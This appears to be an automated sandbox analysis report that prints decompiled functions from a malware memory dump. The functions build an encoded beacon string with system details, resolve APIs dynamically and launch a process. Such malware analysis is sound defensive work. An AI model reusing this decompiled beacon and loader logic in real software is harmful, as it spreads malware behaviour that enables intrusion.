                                                  • Opcode ID: 150e933348dd31a2d66d2bb039a5419fb9f56b844fc239dfddbe835c340e390a
                                                  • Instruction ID: a9e9ca697e62c96b739fd82dc2327786c3c301a05766028da115e1f332a1c906
                                                  • Opcode Fuzzy Hash: 150e933348dd31a2d66d2bb039a5419fb9f56b844fc239dfddbe835c340e390a
                                                  • Instruction Fuzzy Hash: 426186B4710514AEEF20EBBBDC84D5F7BEDDB48743B244996A801E7105E634FD548B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3A279, Relevance: 34.7, APIs: 23, Instructions: 201memorystringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 66%
                                                  			E04B3A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x4b3d018; // 0xf56cfa1f
				asm("bswap eax");
				_t27 =  *0x4b3d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x4b3d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x4b3d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0x4b3d27c; // 0x1fba5a8
				_t3 = _t30 + 0x4b3e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d14b, _t29, _t28, _t27, _t26,  *0x4b3d02c,  *0x4b3d004, _t25);
				_t33 = E04B31C1A();
				_t34 =  *0x4b3d27c; // 0x1fba5a8
				_t4 = _t34 + 0x4b3e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E04B354BC(_t91);
				if(_t96 != 0) {
					_t83 =  *0x4b3d27c; // 0x1fba5a8
					_t6 = _t83 + 0x4b3e8eb; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x4b3d238, 0, _t96);
				}
				_t97 = E04B37649();
				if(_t97 != 0) {
					_t78 =  *0x4b3d27c; // 0x1fba5a8
					_t8 = _t78 + 0x4b3e8f3; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x4b3d238, 0, _t97);
				}
				_t98 =  *0x4b3d32c; // 0x6af95b0
				_a32 = E04B39395(0x4b3d00a, _t98 + 4);
				_t42 =  *0x4b3d2cc; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x4b3d27c; // 0x1fba5a8
					_t11 = _t74 + 0x4b3e8cd; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x4b3d2c8; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x4b3d27c; // 0x1fba5a8
					_t13 = _t71 + 0x4b3e8c6; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x4b3d238, 0, 0x800);
					if(_t100 != 0) {
						E04B37A80(GetTickCount());
						_t50 =  *0x4b3d32c; // 0x6af95b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x4b3d32c; // 0x6af95b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x4b3d32c; // 0x6af95b0
						_t103 = E04B38307(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x4b3c2ac);
							_push(_t103);
							_t62 = E04B33CC8();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04B31199(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04B3A1B0();
								}
								HeapFree( *0x4b3d238, 0, _v44);
							}
							HeapFree( *0x4b3d238, 0, _t103);
						}
						HeapFree( *0x4b3d238, 0, _t100);
					}
					HeapFree( *0x4b3d238, 0, _a24);
				}
				HeapFree( *0x4b3d238, 0, _t105);
				return _a12;
			}
















































                                                  0x04b3a279
                                                  0x04b3a279
                                                  0x04b3a279
                                                  0x04b3a280
                                                  0x04b3a286
                                                  0x04b3a28e
                                                  0x04b3a290
                                                  0x04b3a290
                                                  0x04b3a29d
                                                  0x04b3a2a8
                                                  0x04b3a2ab
                                                  0x04b3a2b6
                                                  0x04b3a2b9
                                                  0x04b3a2be
                                                  0x04b3a2c1
                                                  0x04b3a2c6
                                                  0x04b3a2c9
                                                  0x04b3a2d5
                                                  0x04b3a2e2
                                                  0x04b3a2e4
                                                  0x04b3a2ea
                                                  0x04b3a2ef
                                                  0x04b3a2fa
                                                  0x04b3a2fc
                                                  0x04b3a2ff
                                                  0x04b3a306
                                                  0x04b3a30a
                                                  0x04b3a30c
                                                  0x04b3a311
                                                  0x04b3a31d
                                                  0x04b3a31f
                                                  0x04b3a32b
                                                  0x04b3a32d
                                                  0x04b3a32d
                                                  0x04b3a338
                                                  0x04b3a33c
                                                  0x04b3a33e
                                                  0x04b3a343
                                                  0x04b3a34f
                                                  0x04b3a351
                                                  0x04b3a35d
                                                  0x04b3a35f
                                                  0x04b3a35f
                                                  0x04b3a365
                                                  0x04b3a378
                                                  0x04b3a37c
                                                  0x04b3a383
                                                  0x04b3a386
                                                  0x04b3a38b
                                                  0x04b3a396
                                                  0x04b3a398
                                                  0x04b3a39b
                                                  0x04b3a39b
                                                  0x04b3a39d
                                                  0x04b3a3a4
                                                  0x04b3a3a7
                                                  0x04b3a3ac
                                                  0x04b3a3b6
                                                  0x04b3a3b8
                                                  0x04b3a3c0
                                                  0x04b3a3d9
                                                  0x04b3a3dd
                                                  0x04b3a3e9
                                                  0x04b3a3ee
                                                  0x04b3a3f7
                                                  0x04b3a408
                                                  0x04b3a40c
                                                  0x04b3a415
                                                  0x04b3a41b
                                                  0x04b3a428
                                                  0x04b3a435
                                                  0x04b3a43b
                                                  0x04b3a447
                                                  0x04b3a44d
                                                  0x04b3a44e
                                                  0x04b3a455
                                                  0x04b3a459
                                                  0x04b3a45f
                                                  0x04b3a466
                                                  0x04b3a46d
                                                  0x04b3a473
                                                  0x04b3a47a
                                                  0x04b3a47e
                                                  0x04b3a489
                                                  0x04b3a490
                                                  0x04b3a494
                                                  0x04b3a49d
                                                  0x04b3a49d
                                                  0x04b3a4ae
                                                  0x04b3a4ae
                                                  0x04b3a4bd
                                                  0x04b3a4bd
                                                  0x04b3a4cc
                                                  0x04b3a4cc
                                                  0x04b3a4de
                                                  0x04b3a4de
                                                  0x04b3a4ed
                                                  0x04b3a4fe

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04B3A290
                                                  • wsprintfA.USER32 ref: 04B3A2DD
                                                  • wsprintfA.USER32 ref: 04B3A2FA
                                                  • wsprintfA.USER32 ref: 04B3A31D
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B3A32D
                                                  • wsprintfA.USER32 ref: 04B3A34F
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B3A35F
                                                  • wsprintfA.USER32 ref: 04B3A396
                                                  • wsprintfA.USER32 ref: 04B3A3B6
                                                  • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04B3A3D3
                                                  • GetTickCount.KERNEL32 ref: 04B3A3E3
                                                  • RtlEnterCriticalSection.NTDLL(06AF9570), ref: 04B3A3F7
                                                  • RtlLeaveCriticalSection.NTDLL(06AF9570), ref: 04B3A415
                                                    • Part of subcall function 04B38307: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04B3A428,?,06AF95B0), ref: 04B38332
                                                    • Part of subcall function 04B38307: lstrlen.KERNEL32(?,?,?,04B3A428,?,06AF95B0), ref: 04B3833A
                                                    • Part of subcall function 04B38307: strcpy.NTDLL ref: 04B38351
                                                    • Part of subcall function 04B38307: lstrcat.KERNEL32(00000000,?), ref: 04B3835C
                                                    • Part of subcall function 04B38307: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04B3A428,?,06AF95B0), ref: 04B38379
                                                  • StrTrimA.SHLWAPI(00000000,04B3C2AC,?,06AF95B0), ref: 04B3A447
                                                    • Part of subcall function 04B33CC8: lstrlen.KERNEL32(06AF87FA,00000000,00000000,74ECC740,04B3A453,00000000), ref: 04B33CD8
                                                    • Part of subcall function 04B33CC8: lstrlen.KERNEL32(?), ref: 04B33CE0
                                                    • Part of subcall function 04B33CC8: lstrcpy.KERNEL32(00000000,06AF87FA), ref: 04B33CF4
                                                    • Part of subcall function 04B33CC8: lstrcat.KERNEL32(00000000,?), ref: 04B33CFF
                                                  • lstrcpy.KERNEL32(00000000,?), ref: 04B3A466
                                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 04B3A46D
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04B3A47A
                                                  • lstrcat.KERNEL32(00000000,00000000), ref: 04B3A47E
                                                    • Part of subcall function 04B31199: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 04B3124B
                                                  • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04B3A4AE
                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04B3A4BD
                                                  • HeapFree.KERNEL32(00000000,00000000,?,06AF95B0), ref: 04B3A4CC
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B3A4DE
                                                  • HeapFree.KERNEL32(00000000,?), ref: 04B3A4ED
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                  • String ID:
                                                  • API String ID: 3080378247-0
                                                  • Opcode ID: 6bae05e5f369d6c2a3bf58b838edfae9b1565f1b44ba5d9aa9863d6bc808ba7e
                                                  • Instruction ID: a8fe6ad948a1b5b5574da2e036ba54c9a7c2bac9f48a38d14576f856421e3fe6
                                                  • Opcode Fuzzy Hash: 6bae05e5f369d6c2a3bf58b838edfae9b1565f1b44ba5d9aa9863d6bc808ba7e
                                                  • Instruction Fuzzy Hash: 28619872500204AFEB21DBBAEC88F5E7BECEB48702F154016F948E7250DA39EC159B75
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3816C, Relevance: 13.6, APIs: 9, Instructions: 112stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 27%
                                                  			E04B3816C(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				long _v16;
				intOrPtr _v20;
				signed int _v24;
				void* __esi;
				long _t43;
				intOrPtr _t44;
				intOrPtr _t46;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t54;
				intOrPtr _t57;
				void* _t58;
				void* _t59;
				void* _t60;
				intOrPtr _t66;
				void* _t71;
				void* _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				intOrPtr* _t80;
				intOrPtr _t91;

				_t79 =  *0x4b3d33c; // 0x6af9bc8
				_v24 = 8;
				_t43 = GetTickCount();
				_push(5);
				_t74 = 0xa;
				_v16 = _t43;
				_t44 = E04B370F5(_t74,  &_v16);
				_v8 = _t44;
				if(_t44 == 0) {
					_v8 = 0x4b3c1ac;
				}
				_t46 = E04B38022(_t79);
				_v12 = _t46;
				if(_t46 != 0) {
					_t80 = __imp__;
					_t48 =  *_t80(_v8, _t71);
					_t49 =  *_t80(_v12);
					_t50 =  *_t80(_a4);
					_t54 = E04B32049(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
					_v20 = _t54;
					if(_t54 != 0) {
						_t75 =  *0x4b3d27c; // 0x1fba5a8
						_t16 = _t75 + 0x4b3eb28; // 0x530025
						 *0x4b3d11c(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
						_push(4);
						_t77 = 5;
						_t57 = E04B370F5(_t77,  &_v16);
						_v8 = _t57;
						if(_t57 == 0) {
							_v8 = 0x4b3c1b0;
						}
						_t58 =  *_t80(_v8);
						_t59 =  *_t80(_v12);
						_t60 =  *_t80(_a4);
						_t91 = E04B32049(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
						if(_t91 == 0) {
							E04B39039(_v20);
						} else {
							_t66 =  *0x4b3d27c; // 0x1fba5a8
							_t31 = _t66 + 0x4b3ec48; // 0x73006d
							 *0x4b3d11c(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
							 *_a16 = _v20;
							_v24 = _v24 & 0x00000000;
							 *_a20 = _t91;
						}
					}
					E04B39039(_v12);
				}
				return _v24;
			}




























                                                  0x04b38174
                                                  0x04b3817a
                                                  0x04b38181
                                                  0x04b38187
                                                  0x04b3818b
                                                  0x04b3818f
                                                  0x04b38192
                                                  0x04b38199
                                                  0x04b3819c
                                                  0x04b3819e
                                                  0x04b3819e
                                                  0x04b381a7
                                                  0x04b381ae
                                                  0x04b381b1
                                                  0x04b381b7
                                                  0x04b381c1
                                                  0x04b381ca
                                                  0x04b381d1
                                                  0x04b381ea
                                                  0x04b381f1
                                                  0x04b381f4
                                                  0x04b381fd
                                                  0x04b38206
                                                  0x04b38217
                                                  0x04b38220
                                                  0x04b38224
                                                  0x04b38228
                                                  0x04b3822f
                                                  0x04b38232
                                                  0x04b38234
                                                  0x04b38234
                                                  0x04b3823e
                                                  0x04b38247
                                                  0x04b3824e
                                                  0x04b38266
                                                  0x04b3826a
                                                  0x04b382a7
                                                  0x04b3826c
                                                  0x04b3826f
                                                  0x04b38277
                                                  0x04b38288
                                                  0x04b38294
                                                  0x04b3829c
                                                  0x04b382a0
                                                  0x04b382a0
                                                  0x04b3826a
                                                  0x04b382af
                                                  0x04b382b4
                                                  0x04b382bb

                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 04B38181
                                                  • lstrlen.KERNEL32(?,80000002,00000005), ref: 04B381C1
                                                  • lstrlen.KERNEL32(00000000), ref: 04B381CA
                                                  • lstrlen.KERNEL32(00000000), ref: 04B381D1
                                                  • lstrlenW.KERNEL32(80000002), ref: 04B381DE
                                                  • lstrlen.KERNEL32(?,00000004), ref: 04B3823E
                                                  • lstrlen.KERNEL32(?), ref: 04B38247
                                                  • lstrlen.KERNEL32(?), ref: 04B3824E
                                                  • lstrlenW.KERNEL32(?), ref: 04B38255
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$CountFreeHeapTick
                                                  • String ID:
                                                  • API String ID: 2535036572-0
                                                  • Opcode ID: 0bac8fa206acd29043e7c748acbbb705fea2e221d57e9d88643c4d0b8e911f0c
                                                  • Instruction ID: 28a95bb4eac9b20240f99cc9187efb16f3782879045e5e24c909f6521efdbf2d
                                                  • Opcode Fuzzy Hash: 0bac8fa206acd29043e7c748acbbb705fea2e221d57e9d88643c4d0b8e911f0c
                                                  • Instruction Fuzzy Hash: 00414A76900118EFDF11AFE6CC05A9EBBB5EF48305F054091F904A7211DB39AE25EFA1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B3205E, Relevance: 10.6, APIs: 7, Instructions: 109librarymemoryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 73%
                                                  			E04B3205E(void* __eax, void* __ecx) {
				long _v8;
				char _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t40;
				intOrPtr _t47;
				intOrPtr _t50;
				void* _t58;
				void* _t68;
				intOrPtr* _t70;
				intOrPtr* _t71;

				_t1 = __eax + 0x14; // 0x74183966
				_t69 =  *_t1;
				_t36 = E04B3692C(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				E04B3A8D8( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
				_t40 = _v12(_v12);
				_v8 = _t40;
				if(_t40 == 0 && ( *0x4b3d260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t47 =  *0x4b3d27c; // 0x1fba5a8
					_t18 = _t47 + 0x4b3e3e6; // 0x73797325
					_t68 = E04B395B1(_t18);
					if(_t68 == 0) {
						_v8 = 8;
					} else {
						_t50 =  *0x4b3d27c; // 0x1fba5a8
						_t19 = _t50 + 0x4b3e747; // 0x6af8cef
						_t20 = _t50 + 0x4b3e0af; // 0x4e52454b
						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t71 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E04B384D5();
							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E04B384D5();
							if(_t58 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x4b3d238, 0, _t68);
					}
				}
				_t70 = _v16;
				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
				E04B39039(_t70);
				goto L12;
			}


















                                                  0x04b32066
                                                  0x04b32066
                                                  0x04b32075
                                                  0x04b3207e
                                                  0x04b32081
                                                  0x04b3218e
                                                  0x04b32195
                                                  0x04b32195
                                                  0x04b32090
                                                  0x04b32098
                                                  0x04b3209d
                                                  0x04b320a0
                                                  0x04b320b5
                                                  0x04b320bb
                                                  0x04b320bc
                                                  0x04b320bf
                                                  0x04b320c5
                                                  0x04b320c8
                                                  0x04b320cd
                                                  0x04b320d5
                                                  0x04b320e1
                                                  0x04b320e5
                                                  0x04b32175
                                                  0x04b320eb
                                                  0x04b320eb
                                                  0x04b320f0
                                                  0x04b320f7
                                                  0x04b3210b
                                                  0x04b3210f
                                                  0x04b3215e
                                                  0x04b32111
                                                  0x04b32112
                                                  0x04b32119
                                                  0x04b32132
                                                  0x04b32134
                                                  0x04b32138
                                                  0x04b3213f
                                                  0x04b32159
                                                  0x04b32141
                                                  0x04b3214a
                                                  0x04b3214f
                                                  0x04b3214f
                                                  0x04b3213f
                                                  0x04b3216d
                                                  0x04b3216d
                                                  0x04b320e5
                                                  0x04b3217c
                                                  0x04b32185
                                                  0x04b32189
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 04B3692C: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04B3207A,?,00000001,?,?,00000000,00000000), ref: 04B36951
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04B36973
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04B36989
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04B3699F
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04B369B5
                                                    • Part of subcall function 04B3692C: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04B369CB
                                                  • memset.NTDLL ref: 04B320C8
                                                    • Part of subcall function 04B395B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,04B323E9,63699BCE,04B31354,73797325), ref: 04B395C2
                                                    • Part of subcall function 04B395B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04B395DC
                                                  • GetModuleHandleA.KERNEL32(4E52454B,06AF8CEF,73797325), ref: 04B320FE
                                                  • GetProcAddress.KERNEL32(00000000), ref: 04B32105
                                                  • HeapFree.KERNEL32(00000000,00000000), ref: 04B3216D
                                                    • Part of subcall function 04B384D5: GetProcAddress.KERNEL32(36776F57,04B321E5), ref: 04B384F0
                                                  • CloseHandle.KERNEL32(00000000,00000001), ref: 04B3214A
                                                  • CloseHandle.KERNEL32(?), ref: 04B3214F
                                                  • GetLastError.KERNEL32(00000001), ref: 04B32153
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                  • String ID:
                                                  • API String ID: 3075724336-0
                                                  • Opcode ID: 7ef243611c03f2de5e6f409f41a5719e1a9cc9f5abe8f51dd947df8a4d9e5dc8
                                                  • Instruction ID: 92e3bf9e616cb783f4e12208a6c0b1f61fe3ea69355d582af216c41453bac071
                                                  • Opcode Fuzzy Hash: 7ef243611c03f2de5e6f409f41a5719e1a9cc9f5abe8f51dd947df8a4d9e5dc8
                                                  • Instruction Fuzzy Hash: 453141B6D00208FFDB109FEADD84D9FBBBCEB08346F1144A6E605A7111D735AD498B60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B38307, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 63%
                                                  			E04B38307(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x4b3d27c; // 0x1fba5a8
				_t1 = _t9 + 0x4b3e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E04B39401(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E04B32049(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E04B37225(_t34, _t41, _a8);
						E04B39039(_t41);
						_t42 = E04B38E82(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E04B39039(_t36);
							_t36 = _t42;
						}
						_t43 = E04B3788B(_t36, _t33);
						if(_t43 != 0) {
							E04B39039(_t36);
							_t36 = _t43;
						}
					}
					E04B39039(_t28);
				}
				return _t36;
			}














                                                  0x04b38307
                                                  0x04b3830a
                                                  0x04b3830b
                                                  0x04b38313
                                                  0x04b3831a
                                                  0x04b38321
                                                  0x04b38325
                                                  0x04b3832b
                                                  0x04b38332
                                                  0x04b38337
                                                  0x04b38349
                                                  0x04b3834d
                                                  0x04b38351
                                                  0x04b38357
                                                  0x04b3835c
                                                  0x04b3836c
                                                  0x04b3836e
                                                  0x04b38385
                                                  0x04b38389
                                                  0x04b3838c
                                                  0x04b38391
                                                  0x04b38391
                                                  0x04b3839a
                                                  0x04b3839e
                                                  0x04b383a1
                                                  0x04b383a6
                                                  0x04b383a6
                                                  0x04b3839e
                                                  0x04b383a9
                                                  0x04b383a9
                                                  0x04b383b4

                                                  APIs
                                                    • Part of subcall function 04B39401: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,04B38321,253D7325,00000000,00000000,74ECC740,?,?,04B3A428,?), ref: 04B39468
                                                    • Part of subcall function 04B39401: sprintf.NTDLL ref: 04B39489
                                                  • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,04B3A428,?,06AF95B0), ref: 04B38332
                                                  • lstrlen.KERNEL32(?,?,?,04B3A428,?,06AF95B0), ref: 04B3833A
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • strcpy.NTDLL ref: 04B38351
                                                  • lstrcat.KERNEL32(00000000,?), ref: 04B3835C
                                                    • Part of subcall function 04B37225: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04B3836B,00000000,?,?,?,04B3A428,?,06AF95B0), ref: 04B3723C
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04B3A428,?,06AF95B0), ref: 04B38379
                                                    • Part of subcall function 04B38E82: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04B38385,00000000,?,?,04B3A428,?,06AF95B0), ref: 04B38E8C
                                                    • Part of subcall function 04B38E82: _snprintf.NTDLL ref: 04B38EEA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                  • String ID: =
                                                  • API String ID: 2864389247-1428090586
                                                  • Opcode ID: 661da905d710d6cf67ab9e10ec23340a060c33c4c4bc3f5a80263c70a66cd8ec
                                                  • Instruction ID: ac5133ab42de2ebc1d2c91afb1fa1490cd6c7d7d146485b8879a7a78546dc936
                                                  • Opcode Fuzzy Hash: 661da905d710d6cf67ab9e10ec23340a060c33c4c4bc3f5a80263c70a66cd8ec
                                                  • Instruction Fuzzy Hash: 83110673901224BB5B227BF7AC84C6F3AADDF8465B7054096F504A7200CE79FD0257E1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 04B36CC3, Relevance: 9.1, APIs: 6, Instructions: 120memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SysAllocString.OLEAUT32(00000000), ref: 04B36D1F
                                                  • SysAllocString.OLEAUT32(0070006F), ref: 04B36D33
                                                  • SysAllocString.OLEAUT32(00000000), ref: 04B36D45
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B36DA9
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B36DB8
                                                  • SysFreeString.OLEAUT32(00000000), ref: 04B36DC3
                                                  Memory Dump Source
